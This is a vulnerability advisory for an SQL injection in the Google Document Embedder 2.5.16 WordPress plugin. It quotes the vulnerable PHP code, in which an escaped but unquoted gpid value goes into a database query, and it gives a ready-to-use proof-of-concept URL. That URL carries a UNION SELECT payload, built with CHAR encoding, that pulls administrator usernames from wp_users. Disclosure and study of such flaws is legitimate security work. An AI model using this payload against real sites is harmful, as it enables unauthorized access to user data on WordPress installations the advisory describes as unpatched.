Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection Data : 2014 – 12 -03 Exploit Author : Securely (Yoo Hee man) Plugin : google-document-embedder Fixed version : N/A Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip 1. Detail - Google Document Embedder v2.5.14 have SQL Injection - This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection. - but mysql_real_escape_string() function is bypass possible - vulnerability file : /google-document-embedder/~view.php ================================================================ 50 // get profile 51 if ( isset( $_GET['gpid'] ) ) { 52 $gpid = mysql_real_escape_string( $_GET['gpid'] ); //mysql_real_escape_string() is bypass 53 if ( $profile = gde_get_profile( $gpid ) ) { 54 $tb = $profile['tb_flags']; 55 $vw = $profile['vw_flags']; 56 $bg = $profile['vw_bgcolor']; 57 $css = $profile['vw_css']; 58 } 59 } ================================================================ =============================================================== 373 function gde_get_profile( $id ) { 374 global $wpdb; 375 $table = $wpdb->prefix . 'gde_profiles'; 376 377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A ); 378 $profile = unserialize($profile[0]['profile_data']); 379 380 if ( is_array($profile) ) { 381 return $profile; 382 } else { 383 return false; 384 } 385 } ================================================================ 2. POC http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1 3. Solution: Not patched 4. Discovered By : Securely(Yoo Hee man) God2zuzu@naver.com